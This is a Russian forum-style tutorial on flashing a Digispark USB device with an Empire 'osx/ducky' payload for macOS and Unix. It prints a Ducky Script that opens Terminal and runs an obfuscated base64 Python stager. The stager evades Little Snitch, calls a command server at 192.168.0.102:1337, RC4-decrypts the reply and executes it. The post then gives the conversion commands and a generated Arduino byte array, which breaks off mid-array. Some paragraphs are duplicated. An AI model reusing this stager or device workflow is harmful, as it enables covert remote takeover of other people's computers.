В прошлый раз я рассказал о Digispark - на столько же дешёвым, на сколько и неудачным, но всё же имеющем место быть клоне Rubber Ducky.
Оффициально Digi поддерживает только C++, но я бы хотел рассказать о костыле, позволяющем писать на весьма удобном и лаконичном Ducky Script, который предназначен для программирования Rubber Ducky.
Для примера я буду использовать Empire-пейлоад osx/ducky (подходит для всех unix), хотя можно делать и свои .duck скрипты.
Задаём файл для сохранения и генерируем
На выходе я получил такой ducky-script:
Преобразуем .duck в юзабельный для Digi .ino
Теперь самое главное - конвертирование.
Копируем наш ducky-пейлоад в ранее скачанный duckencoder.
Сдесь мы преобразуем его в "сырой" режим:
Примечание: автор говорит, что можно использовать функцию -l для автоматического выбора нужной раскладки. На практике же это не сработало.
Отлично, у нас есть код в сыром виде. Переместим его в папку duck2spark и выполним последние преобразования:
Если попытаться скомпилировать сразу, то опять опять же столкнёмся с нехваткой памяти:
По этому прийдётся урезать код, оставив нас без красивых мерцаний светодиодом по окончанию работы скрипта:
Готово! Теперь всё компилируется, и мы готовы карать неверных тестировать свой компьютер.
Для полноценной работы стоит запариться над открытием терминала и английским вводом, но тут я использую дефолтный Empire-osx/ducky
Такой результат получаем на выходе:
Получен всеми желанный агент и доступ к компьютеру
Да-да, доступ к своему же компьютеру
И скажите теперь, что linux/osx - безопасные системы!
Оффициально Digi поддерживает только C++, но я бы хотел рассказать о костыле, позволяющем писать на весьма удобном и лаконичном Ducky Script, который предназначен для программирования Rubber Ducky.
Задаём файл для сохранения и генерируем
На выходе я получил такой ducky-script:
Код:
DELAY 1000
COMMAND SPACE
DELAY 1000
STRING TERMINAL
ENTER
DELAY 1000
STRING echo "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xOTIuMTY4LjAuMTAyOjEzMzcnO3Q9Jy9uZXdzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPWcyUVhrakpuN2gvT3NoOE1DWDdyVjZJR3hxUT0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc3YjI0YWZjOGJjODBlNTQ4ZDY2YzRlN2ZmNzIxNzFjNSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSk='));" | python &
ENTER
DELAY 1000
Теперь самое главное - конвертирование.
Копируем наш ducky-пейлоад в ранее скачанный duckencoder.
Сдесь мы преобразуем его в "сырой" режим:
[SIZE=4]python2 duckencoder.py -i unixhack.duck -o unixhack.bin[/SIZE]
Примечание: автор говорит, что можно использовать функцию -l для автоматического выбора нужной раскладки. На практике же это не сработало.
Отлично, у нас есть код в сыром виде. Переместим его в папку duck2spark и выполним последние преобразования:
[SIZE=4]python2 duck2spark.py -i unixhack.bin -o unixhack.ino[/SIZE]
Если попытаться скомпилировать сразу, то опять опять же столкнёмся с нехваткой памяти:
По этому прийдётся урезать код, оставив нас без красивых мерцаний светодиодом по окончанию работы скрипта:
Код:
/*
* Sketch generated by duck2spark from Marcus Mengs aka MaMe82
*
*/
#include "DigiKeyboard.h"[/SIZE][/SIZE]
[SIZE=4][SIZE=4]#define DUCK_LEN 2810
const PROGMEM uint8_t duckraw [DUCK_LEN] = {
0x0, 0xff, 0x0, 0xff, 0x0, 0xff, 0x0, 0xeb, 0x2c, 0x8, 0x0, 0xff, 0x0, 0xff, 0x0, 0xff, 0x0, 0xeb, 0x17, 0x2, 0x8, 0x2, 0x15, 0x2, 0x10, 0x2, 0xc, 0x2, 0x11, 0x2, 0x4, 0x2, 0xf, 0x2, 0x28, 0x0, 0x0, 0xff, 0x0, 0xff, 0x0, 0xff, 0x0, 0xeb, 0x8, 0x0, 0x6, 0x0, 0xb, 0x0, 0x12, 0x0, 0x2c, 0x0, 0x34, 0x2, 0xc, 0x0, 0x10, 0x0, 0x13, 0x0, 0x12, 0x0, 0x15, 0x0, 0x17, 0x0, 0x2c, 0x0, 0x16, 0x0, 0x1c, 0x0, 0x16, 0x0, 0x36, 0x0, 0x5, 0x0, 0x4, 0x0, 0x16, 0x0, 0x8, 0x0, 0x23, 0x0, 0x21, 0x0, 0x36, 0x0, 0x1a, 0x0, 0x4, 0x0, 0x15, 0x0, 0x11, 0x0, 0xc, 0x0, 0x11, 0x0, 0xa, 0x0, 0x16, 0x0, 0x33, 0x0, 0x1a, 0x0, 0x4, 0x0, 0x15, 0x0, 0x11, 0x0, 0xc, 0x0, 0x11, 0x0, 0xa, 0x0, 0x16, 0x0, 0x37, 0x0, 0x9, 0x0, 0xc, 0x0, 0xf, 0x0, 0x17, 0x0, 0x8, 0x0, 0x15, 0x0, 0x1a, 0x0, 0x4, 0x0, 0x15, 0x0, 0x11, 0x0, 0xc, 0x0, 0x11, 0x0, 0xa, 0x0, 0x16, 0x0, 0x26, 0x2, 0x34, 0x0, 0xc, 0x0, 0xa, 0x0, 0x11, 0x0, 0x12, 0x0, 0x15, 0x0, 0x8, 0x0, 0x34, 0x0, 0x27, 0x2, 0x33, 0x0, 0x8, 0x0, 0x1b, 0x0, 0x8, 0x0, 0x6, 0x0, 0x26, 0x2, 0x5, 0x0, 0x4, 0x0, 0x16, 0x0, 0x8, 0x0, 0x23, 0x0, 0x21, 0x0, 0x37, 0x0, 0x5, 0x0, 0x23, 0x0, 0x21, 0x0, 0x7, 0x0, 0x8, 0x0, 0x6, 0x0, 0x12, 0x0, 0x7, 0x0, 0x8, 0x0, 0x26, 0x2, 0x34, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x1e, 0x0, 0x1a, 0x0, 0x5, 0x0, 0x20, 0x0, 0xd, 0x2, 0x27, 0x0, 0xc, 0x2, 0xb, 0x2, 0x11, 0x2, 0x22, 0x0, 0x6, 0x0, 0x1d, 0x0, 0x17, 0x0, 0x13, 0x0, 0x5, 0x0, 0x1b, 0x2, 0x5, 0x2, 0x19, 0x0, 0x6, 0x0, 0x11, 0x0, 0x14, 0x2, 0xa, 0x0, 0x6, 0x0, 0x10, 0x0, 0x18, 0x2, 0x16, 0x0, 0xc, 0x2, 0xb, 0x2, 0x11, 0x2, 0x1e, 0x0, 0x1c, 0x2, 0x11, 0x0, 0x5, 0x2, 0x1c, 0x0, 0x5, 0x0, 0x1f, 0x0, 0x11, 0x2, 0xf, 0x0, 0x6, 0x0, 0x20, 0x0, 0x10, 0x2, 0x24, 0x0, 0x1c, 0x2, 0x1f, 0x0, 0x1e, 0x0, 0xe, 0x0, 0xc, 0x2, 0x7, 0x2, 0x27, 0x0, 0xa, 0x0, 0xc, 0x2, 0x11, 0x0, 0x5, 0x2, 0x1d, 0x0, 0xc, 0x2, 0x6, 0x2, 0x1e, 0x0, 0xf, 0x0, 0x1d, 0x2, 0xc, 0x0, 0x5, 0x2, 0x25, 0x0, 0xc, 0x2, 0xa, 0x2, 0x7, 0x0, 0x1c, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0x4, 0x2, 0xa, 0x0, 0x17, 0x2, 0xa, 0x2, 0xf, 0x0, 0x27, 0x0, 0x7, 0x0, 0xa, 0x2, 0x1b, 0x0, 0xf, 0x0, 0x1b, 0x2, 0x6, 0x2, 0x5, 0x2, 0x17, 0x2, 0x5, 0x0, 0x10, 0x0, 0xf, 0x0, 0x27, 0x0, 0x1c, 0x2, 0x1f, 0x0, 0xa, 0x0, 0xa, 0x0, 0x9, 0x0, 0x6, 0x2, 0x5, 0x2, 0x11, 0x0, 0x6, 0x0, 0x10, 0x0, 0x19, 0x2, 0x1a, 0x0, 0xc, 0x2, 0x6, 0x2, 0x1e, 0x0, 0x1f, 0x0, 0xc, 0x2, 0xa, 0x2, 0x7, 0x0, 0x1c, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0x4, 0x2, 0xc, 0x0, 0x6, 0x2, 0x11, 0x0, 0x5, 0x2, 0x1d, 0x0, 0xc, 0x2, 0x7, 0x2, 0x27, 0x0, 0xa, 0x0, 0x6, 0x0, 0x20, 0x0, 0x19, 0x2, 0xc, 0x0, 0x6, 0x0, 0xb, 0x2, 0xd, 0x2, 0x19, 0x0, 0x1c, 0x2, 0x1f, 0x0, 0x19, 0x2, 0x1d, 0x0, 0x6, 0x0, 0x1c, 0x0, 0x22, 0x0, 0x14, 0x2, 0x5, 0x0, 0x20, 0x0, 0x5, 0x2, 0xf, 0x0, 0x5, 0x0, 0xc, 0x0, 0xb, 0x0, 0xd, 0x0, 0x5, 0x0, 0x1a, 0x2, 0x14, 0x2, 0x16, 0x0, 0xc, 0x2, 0xb, 0x2, 0x11, 0x2, 0x12, 0x0, 0x1d, 0x2, 0x1a, 0x2, 0x1b, 0x0, 0x16, 0x0, 0x13, 0x2, 0x19, 0x2, 0x15, 0x2, 0x1c, 0x0, 0x7, 0x0, 0x1a, 0x2, 0x18, 0x2, 0x16, 0x0, 0xc, 0x2, 0xb, 0x2, 0x11, 0x2, 0x27, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x26, 0x0, 0x1e, 0x0, 0x7, 0x0, 0x7, 0x2, 0x1e, 0x0, 0x1d, 0x0, 0x7, 0x0, 0x1a, 0x2, 0xd, 0x2, 0x1a, 0x0, 0x6, 0x0, 0x10, 0x0, 0x26, 0x0, 0xd, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0x11, 0x2, 0x1d, 0x0, 0xf, 0x2, 0xf, 0x0, 0x5, 0x2, 0xd, 0x2, 0x18, 0x2, 0x8, 0x2, 0x18, 0x2, 0x13, 0x0, 0x6, 0x2, 0x10, 0x0, 0x26, 0x0, 0x1e, 0x0, 0x7, 0x0, 0x6, 0x2, 0x4, 0x2, 0x26, 0x0, 0xc, 0x2, 0xb, 0x2, 0x5, 0x2, 0x1d, 0x0, 0xf, 0x2, 0x11, 0x0, 0x11, 0x2, 0x27, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x26, 0x0, 0x1e, 0x0, 0x7, 0x0, 0x6, 0x2, 0x22, 0x0, 0x1c, 0x0, 0x1d, 0x2, 0x1a, 0x2, 0x9, 0x2, 0xe, 0x0, 0xe, 0x2, 0x6, 0x2, 0xe, 0x0, 0xe, 0x2, 0x6, 0x0, 0xb, 0x2, 0x10, 0x2, 0x18, 0x0, 0x6, 0x0, 0x20, 0x0, 0x15, 0x2, 0xe, 0x0, 0x5, 0x0, 0x20, 0x0, 0x19, 0x2, 0x27, 0x0, 0xf, 0x2, 0x10, 0x0, 0x11, 0x2, 0x16, 0x0, 0x5, 0x0, 0x20, 0x0, 0x11, 0x2, 0xf, 0x0, 0xe, 0x2, 0x6, 0x2, 0xe, 0x0, 0xe, 0x2, 0x4, 0x0, 0x1a, 0x2, 0x1c, 0x2, 0xa, 0x0, 0x6, 0x0, 0x10, 0x0, 0x18, 0x2, 0x18, 0x0, 0x6, 0x0, 0x1f, 0x0, 0x19, 0x2, 0xb, 0x0, 0x6, 0x0, 0x10, 0x0, 0x11, 0x2, 0x12, 0x0, 0xe, 0x2, 0x6, 0x2, 0xd, 0x2, 0x10, 0x2, 0x4, 0x0, 0x1b, 0x2, 0x15, 0x2, 0x27, 0x0, 0x5, 0x0, 0xa, 0x2, 0x18, 0x2, 0xa, 0x0, 0x18, 0x2, 0x1f, 0x0, 0x22, 0x0, 0x13, 0x0, 0x7, 0x0, 0xa, 0x2, 0x11, 0x2, 0x12, 0x0, 0xc, 0x2, 0xc, 0x0, 0x1a, 0x0, 0xa, 0x0, 0x5, 0x0, 0x20, 0x0, 0x19, 0x2, 0x27, 0x0, 0xe, 0x2, 0x17, 0x2, 0x12, 0x0, 0xe, 0x2, 0xc, 0x2, 0x6, 0x2, 0x4, 0x2, 0xa, 0x0, 0x6, 0x0, 0x20, 0x0, 0xf, 0x0, 0x1d, 0x0, 0xf, 0x2, 0x10, 0x0, 0x19, 0x2, 0x21, 0x0, 0x4, 0x0, 0x1b, 0x2, 0x14, 0x2, 0x12, 0x0, 0xe, 0x2, 0x14, 0x2, 0x13, 0x0, 0x13, 0x0, 0x5, 0x0, 0x1b, 0x2, 0x5, 0x2, 0x19, 0x0, 0x6, 0x0, 0x11, 0x0, 0x14, 0x2, 0xa, 0x0, 0x7, 0x0, 0x1b, 0x2, 0xd, 0x2, 0x16, 0x0, 0x5, 0x0, 0xa, 0x2, 0xf, 0x0, 0xc, 0x0, 0x10, 0x2, 0xd, 0x0, 0x16, 0x0, 0xe, 0x2, 0x19, 0x2, 0x18, 0x2, 0x8, 0x2, 0x26, 0x0, 0xd, 0x2, 0x27, 0x0, 0x1e, 0x0, 0x19, 0x0, 0x8, 0x0, 0x10, 0x0, 0xf, 0x0, 0x16, 0x0, 0x5, 0x0, 0xa, 0x2, 0x8, 0x2, 0x19, 0x0, 0x11, 0x2, 0x16, 0x2, 0x21, 0x0, 0x1a, 0x0, 0xc, 0x2, 0x6, 0x2, 0xb, 0x0, 0x1b, 0x2, 0x4, 0x0, 0x1a, 0x2, 0x22, 0x0, 0xe, 0x0, 0x5, 0x0, 0x20, 0x0, 0x7, 0x0, 0x1d, 0x0, 0xc, 0x2, 0x8, 0x2, 0x22, 0x0, 0x18, 0x2, 0xc, 0x2, 0x7, 0x2, 0x1c, 0x2, 0x18, 0x0, 0x10, 0x2, 0x17, 0x2, 0x16, 0x0, 0xa, 0x0, 0x19, 0x2, 0x27, 0x0, 0x26, 0x0, 0x1b, 0x2, 0x11, 0x2, 0xd, 0x0, 0x14, 0x2, 0x24, 0x0, 0xc, 0x2, 0x9, 0x2, 0x15, 0x2, 0x1c, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x15, 0x2, 0xf, 0x0, 0x5, 0x0, 0x11, 0x0, 0x14, 0x2, 0x19, 0x0, 0x11, 0x2, 0x1c, 0x0, 0x21, 0x0, 0x1a, 0x0, 0x12, 0x2, 0x1c, 0x0, 0x5, 0x2, 0x1c, 0x0, 0x7, 0x0, 0xd, 0x0, 0x12, 0x0, 0x1b, 0x0, 0x10, 0x2, 0x16, 0x2, 0x21, 0x0, 0x1a, 0x0, 0xe, 0x2, 0x16, 0x2, 0x5, 0x2, 0x16, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x17, 0x0, 0xf, 0x0, 0xc, 0x2, 0x8, 0x2, 0x7, 0x0, 0xf, 0x0, 0x1c, 0x2, 0x1f, 0x0, 0x17, 0x0, 0x19, 0x0, 0xd, 0x2, 0x1d, 0x0, 0x17, 0x0, 0x1d, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0xd, 0x2, 0x1f, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0xc, 0x2, 0x26, 0x0, 0xd, 0x2, 0x1f, 0x0, 0xb, 0x0, 0x27, 0x0, 0x7, 0x0, 0xb, 0x2, 0x4, 0x2, 0x23, 0x0, 0xf, 0x2, 0x1c, 0x0, 0x25, 0x0, 0x1b, 0x0, 0x12, 0x2, 0x17, 0x2, 0xc, 0x2, 0x18, 0x0, 0x10, 0x2, 0x17, 0x2, 0x1c, 0x2, 0x21, 0x0, 0xf, 0x2, 0xd, 0x0, 0x4, 0x2, 0x18, 0x0, 0x10, 0x2, 0x17, 0x2, 0x4, 0x2, 0x1c, 0x0, 0x12, 0x2, 0xd, 0x0, 0x8, 0x2, 0x1d, 0x0, 0x10, 0x2, 0x1d, 0x0, 0x6, 0x0, 0x11, 0x0, 0x12, 0x2, 0x20, 0x0, 0x14, 0x2, 0x26, 0x0, 0xd, 0x2, 0x1c, 0x0, 0x26, 0x0, 0x18, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0x7, 0x0, 0x1d, 0x0, 0xf, 0x2, 0x11, 0x0, 0x5, 0x2, 0x12, 0x0, 0x6, 0x0, 0x6, 0x2, 0x6, 0x0, 0x24, 0x0, 0x6, 0x0, 0x10, 0x0, 0x19, 0x2, 0x1b, 0x0, 0x13, 0x2, 0x1b, 0x2, 0x19, 0x2, 0x1c, 0x0, 0x5, 0x0, 0xa, 0x2, 0x1b, 0x0, 0x13, 0x0, 0x1c, 0x2, 0xd, 0x0, 0xc, 0x2, 0x18, 0x0, 0x18, 0x2, 0x10, 0x0, 0x19, 0x2, 0x1b, 0x0, 0x7, 0x0, 0x1a, 0x2, 0x19, 0x2, 0x1d, 0x0, 0x7, 0x0, 0x6, 0x2, 0xb, 0x0, 0x1d, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0xd, 0x2, 0x1f, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0xc, 0x2, 0x15, 0x0, 0x7, 0x0, 0x6, 0x2, 0xe, 0x0, 0x24, 0x0, 0x6, 0x2, 0x11, 0x0, 0xd, 0x2, 0xf, 0x0, 0x6, 0x0, 0x16, 0x2, 0x22, 0x0, 0xb, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x15, 0x2, 0x9, 0x0, 0x4, 0x0, 0xa, 0x2, 0x19, 0x2, 0xb, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x19, 0x2, 0x1c, 0x0, 0xe, 0x2, 0x6, 0x2, 0x7, 0x0, 0x19, 0x2, 0x6, 0x0, 0x1f, 0x0, 0x19, 0x2, 0x1c, 0x0, 0xf, 0x2, 0x18, 0x2, 0x9, 0x2, 0x11, 0x0, 0x1d, 0x2, 0x1a, 0x2, 0x22, 0x0, 0x27, 0x0, 0xd, 0x2, 0x1c, 0x0, 0x1b, 0x0, 0x19, 0x2, 0x14, 0x2, 0x16, 0x2, 0xe, 0x0, 0x24, 0x0, 0x6, 0x2, 0x11, 0x0, 0xd, 0x2, 0xf, 0x0, 0x6, 0x0, 0x16, 0x2, 0x22, 0x0, 0xb, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x15, 0x2, 0x9, 0x0, 0x4, 0x0, 0xa, 0x2, 0x19, 0x2, 0xb, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x19, 0x2, 0x1c, 0x0, 0xe, 0x2, 0x6, 0x2, 0x7, 0x0, 0x7, 0x2, 0x5, 0x0, 0x1f, 0x0, 0x26, 0x0, 0x15, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x18, 0x2, 0x11, 0x0, 0xf, 0x2, 0x6, 0x2, 0xd, 0x2, 0x1d, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0x11, 0x2, 0x1d, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x26, 0x0, 0x18, 0x0, 0x13, 0x2, 0x1a, 0x2, 0x6, 0x0, 0x1c, 0x0, 0x18, 0x2, 0x19, 0x2, 0xb, 0x0, 0x15, 0x0, 0x4, 0x0, 0xe, 0x0, 0x13, 0x0, 0x18, 0x0, 0x11, 0x2, 0x1f, 0x0, 0xa, 0x0, 0x19, 0x0, 0x17, 0x2, 0x20, 0x0, 0x11, 0x2, 0x12, 0x0, 0x12, 0x2, 0x8, 0x2, 0x1e, 0x0, 0x7, 0x2, 0x1a, 0x2, 0x7, 0x2, 0x7, 0x0, 0x1c, 0x0, 0x19, 0x2, 0xd, 0x0, 0x1d, 0x2, 0xd, 0x2, 0x15, 0x2, 0x20, 0x0, 0xb, 0x0, 0x1b, 0x0, 0x18, 0x2, 0x17, 0x2, 0x27, 0x0, 0xc, 0x0, 0xe, 0x2, 0x17, 0x2, 0x16, 0x0, 0xe, 0x2, 0x6, 0x0, 0xb, 0x2, 0xd, 0x2, 0x19, 0x0, 0x8, 0x0, 0xb, 0x2, 0xe, 0x0, 0xa, 0x0, 0x13, 0x2, 0x16, 0x2, 0x5, 0x2, 0x1e, 0x0, 0x6, 0x0, 0x10, 0x0, 0x1b, 0x0, 0x16, 0x0, 0x4, 0x0, 0x1a, 0x2, 0xc, 0x2, 0x1c, 0x0, 0xf, 0x2, 0xf, 0x0, 0x5, 0x2, 0x1c, 0x0, 0x5, 0x0, 0x20, 0x0, 0xb, 0x0, 0x22, 0x0, 0x16, 0x2, 0xa, 0x2, 0x9, 0x2, 0x18, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x1b, 0x0, 0xf, 0x0, 0x6, 0x0, 0xc, 0x0, 0xa, 0x0, 0x13, 0x0, 0x12, 0x2, 0x1a, 0x0, 0x13, 0x0, 0x19, 0x0, 0xc, 0x2, 0x7, 0x2, 0x27, 0x0, 0xa, 0x0, 0x7, 0x0, 0x1b, 0x2, 0xd, 0x2, 0x16, 0x0, 0x5, 0x0, 0xa, 0x2, 0xf, 0x0, 0xc, 0x0, 0x10, 0x2, 0xc, 0x0, 0x22, 0x0, 0xc, 0x0, 0x7, 0x0, 0x1a, 0x2, 0xf, 0x0, 0x16, 0x0, 0x1d, 0x2, 0x9, 0x2, 0x26, 0x0, 0x19, 0x0, 0x6, 0x0, 0xa, 0x2, 0x19, 0x2, 0x18, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0xc, 0x2, 0x12, 0x0, 0x6, 0x0, 0xb, 0x2, 0xd, 0x2, 0x19, 0x0, 0x8, 0x0, 0xb, 0x2, 0xe, 0x0, 0x13, 0x0, 0x12, 0x2, 0x1a, 0x0, 0x13, 0x0, 0x1e, 0x0, 0x6, 0x0, 0x10, 0x0, 0x1b, 0x0, 0x16, 0x0, 0x4, 0x0, 0x1a, 0x2, 0xc, 0x2, 0x1c, 0x0, 0xf, 0x2, 0x10, 0x0, 0xf, 0x0, 0x18, 0x0, 0x6, 0x0, 0x20, 0x0, 0x15, 0x2, 0xb, 0x0, 0x5, 0x0, 0xa, 0x2, 0x1b, 0x0, 0x9, 0x0, 0x5, 0x0, 0x20, 0x0, 0x5, 0x2, 0xf, 0x0, 0x5, 0x0, 0x10, 0x0, 0x19, 0x2, 0x1c, 0x0, 0xe, 0x2, 0xa, 0x2, 0x25, 0x0, 0x13, 0x0, 0x12, 0x2, 0x1a, 0x0, 0x13, 0x0, 0xb, 0x0, 0x13, 0x2, 0x1b, 0x2, 0x19, 0x2, 0x1c, 0x0, 0x5, 0x0, 0xa, 0x2, 0x1b, 0x0, 0x13, 0x0, 0x1c, 0x2, 0xd, 0x0, 0xc, 0x2, 0x18, 0x0, 0x7, 0x0, 0x1b, 0x2, 0xd, 0x2, 0x16, 0x0, 0x5, 0x0, 0x20, 0x0, 0x5, 0x2, 0xf, 0x0, 0x5, 0x0, 0xc, 0x0, 0xb, 0x0, 0x1c, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0x8, 0x2, 0x13, 0x0, 0xf, 0x2, 0x11, 0x0, 0xd, 0x2, 0xf, 0x0, 0x1c, 0x2, 0x1a, 0x2, 0x14, 0x2, 0x12, 0x0, 0xe, 0x2, 0x17, 0x2, 0x16, 0x0, 0xe, 0x2, 0x16, 0x2, 0x19, 0x2, 0x1c, 0x2, 0x26, 0x0, 0x1c, 0x2, 0x19, 0x2, 0x16, 0x0, 0x1a, 0x0, 0x12, 0x2, 0xd, 0x0, 0x15, 0x2, 0x7, 0x0, 0x12, 0x2, 0x1f, 0x0, 0x15, 0x2, 0xb, 0x0, 0x7, 0x0, 0xa, 0x2, 0x8, 0x2, 0x26, 0x0, 0x1c, 0x2, 0x19, 0x2, 0x16, 0x0, 0x27, 0x0, 0x12, 0x2, 0xf, 0x0, 0x27, 0x0, 0x24, 0x0, 0x4, 0x0, 0x1f, 0x0, 0x19, 0x2, 0x22, 0x0, 0x13, 0x2, 0x18, 0x2, 0xf, 0x0, 0x1a, 0x2, 0xe, 0x2, 0x1c, 0x0, 0x6, 0x0, 0x20, 0x0, 0x1c, 0x2, 0xd, 0x0, 0xc, 0x2, 0x27, 0x0, 0x1c, 0x2, 0x1a, 0x2, 0x1d, 0x2, 0xd, 0x0, 0x12, 0x2, 0xa, 0x2, 0xd, 0x2, 0xd, 0x0, 0x12, 0x2, 0x7, 0x2, 0x5, 0x2, 0xf, 0x0, 0x11, 0x2, 0x17, 0x2, 0x14, 0x2, 0x21, 0x0, 0x1d, 0x2, 0x7, 0x2, 0x1c, 0x2, 0x1f, 0x0, 0x1c, 0x2, 0x1d, 0x0, 0x15, 0x2, 0xf, 0x0, 0x11, 0x2, 0x1f, 0x0, 0x1d, 0x2, 0x10, 0x0, 0x11, 0x2, 0x1d, 0x0, 0xc, 0x2, 0x1b, 0x0, 0x11, 0x2, 0x1d, 0x0, 0x9, 0x2, 0xd, 0x0, 0x11, 0x2, 0x16, 0x2, 0x6, 0x0, 0x24, 0x0, 0x18, 0x2, 0x1c, 0x0, 0x1b, 0x0, 0x14, 0x0, 0xf, 0x2, 0xa, 0x2, 0x26, 0x0, 0x1e, 0x0, 0x7, 0x0, 0x7, 0x2, 0x1e, 0x0, 0x1c, 0x0, 0x1c, 0x2, 0x1a, 0x2, 0x22, 0x0, 0x11, 0x0, 0x1d, 0x2, 0x16, 0x2, 0xa, 0x0, 0x1c, 0x0, 0x11, 0x2, 0x17, 0x2, 0x1c, 0x2, 0x13, 0x0, 0xf, 0x2, 0x7, 0x2, 0x4, 0x2, 0x16, 0x0, 0x1a, 0x2, 0x1e, 0x0, 0x27, 0x0, 0xe, 0x2, 0x1d, 0x2, 0x10, 0x0, 0x26, 0x0, 0x1c, 0x0, 0xc, 0x2, 0xa, 0x2, 0xe, 0x0, 0xa, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x21, 0x0, 0xa, 0x0, 0x6, 0x0, 0x10, 0x0, 0x9, 0x2, 0x18, 0x0, 0x1d, 0x2, 0x1f, 0x0, 0x18, 0x2, 0x12, 0x0, 0x10, 0x2, 0xd, 0x0, 0x18, 0x2, 0x1f, 0x0, 0xe, 0x2, 0x17, 0x2, 0x12, 0x0, 0xe, 0x2, 0xc, 0x2, 0x6, 0x2, 0x4, 0x2, 0xa, 0x0, 0xc, 0x2, 0xa, 0x2, 0x12, 0x0, 0x26, 0x0, 0xe, 0x2, 0xa, 0x2, 0x12, 0x0, 0x15, 0x0, 0x18, 0x2, 0x1e, 0x0, 0x17, 0x0, 0x13, 0x0, 0x1b, 0x2, 0x16, 0x2, 0x17, 0x0, 0x19, 0x0, 0x6, 0x0, 0x10, 0x0, 0x14, 0x2, 0x12, 0x0, 0x4, 0x0, 0x1f, 0x0, 0x19, 0x2, 0x22, 0x0, 0x1a, 0x2, 0x1f, 0x0, 0xe, 0x0, 0xf, 0x0, 0x5, 0x0, 0xa, 0x2, 0x19, 0x2, 0x18, 0x0, 0xe, 0x2, 0xa, 0x2, 0x17, 0x0, 0xf, 0x0, 0x8, 0x0, 0x16, 0x2, 0xf, 0x0, 0x7, 0x0, 0xe, 0x2, 0x16, 0x2, 0xe, 0x0, 0xf, 0x0, 0x10, 0x2, 0xd, 0x0, 0x18, 0x2, 0x1f, 0x0, 0x6, 0x2, 0xc, 0x0, 0x4, 0x2, 0xa, 0x0, 0xc, 0x2, 0x6, 0x2, 0x5, 0x2, 0x17, 0x2, 0x1a, 0x2, 0x1f, 0x0, 0xf, 0x0, 0x7, 0x0, 0xf, 0x2, 0x9, 0x2, 0x11, 0x2, 0x5, 0x0, 0x4, 0x0, 0xf, 0x0, 0x27, 0x0, 0x26, 0x0, 0x18, 0x2, 0x1e, 0x0, 0x17, 0x0, 0x14, 0x0, 0x1b, 0x2, 0x16, 0x2, 0x1b, 0x0, 0x17, 0x2, 0x1a, 0x2, 0x1f, 0x0, 0xf, 0x0, 0x7, 0x0, 0x6, 0x2, 0x10, 0x0, 0xe, 0x0, 0x26, 0x0, 0x4, 0x0, 0xd, 0x0, 0x27, 0x0, 0x1a, 0x0, 0x6, 0x2, 0x10, 0x0, 0x1d, 0x2, 0x19, 0x0, 0x6, 0x0, 0xc, 0x0, 0x5, 0x2, 0xd, 0x0, 0x4, 0x0, 0xa, 0x2, 0x9, 0x2, 0x1c, 0x0, 0xc, 0x2, 0xa, 0x2, 0xf, 0x0, 0x18, 0x0, 0xc, 0x2, 0xa, 0x2, 0x15, 0x2, 0xb, 0x0, 0x7, 0x0, 0xa, 0x2, 0x8, 0x2, 0x23, 0x0, 0x6, 0x2, 0xc, 0x0, 0x4, 0x2, 0xa, 0x0, 0xc, 0x2, 0x6, 0x2, 0x5, 0x2, 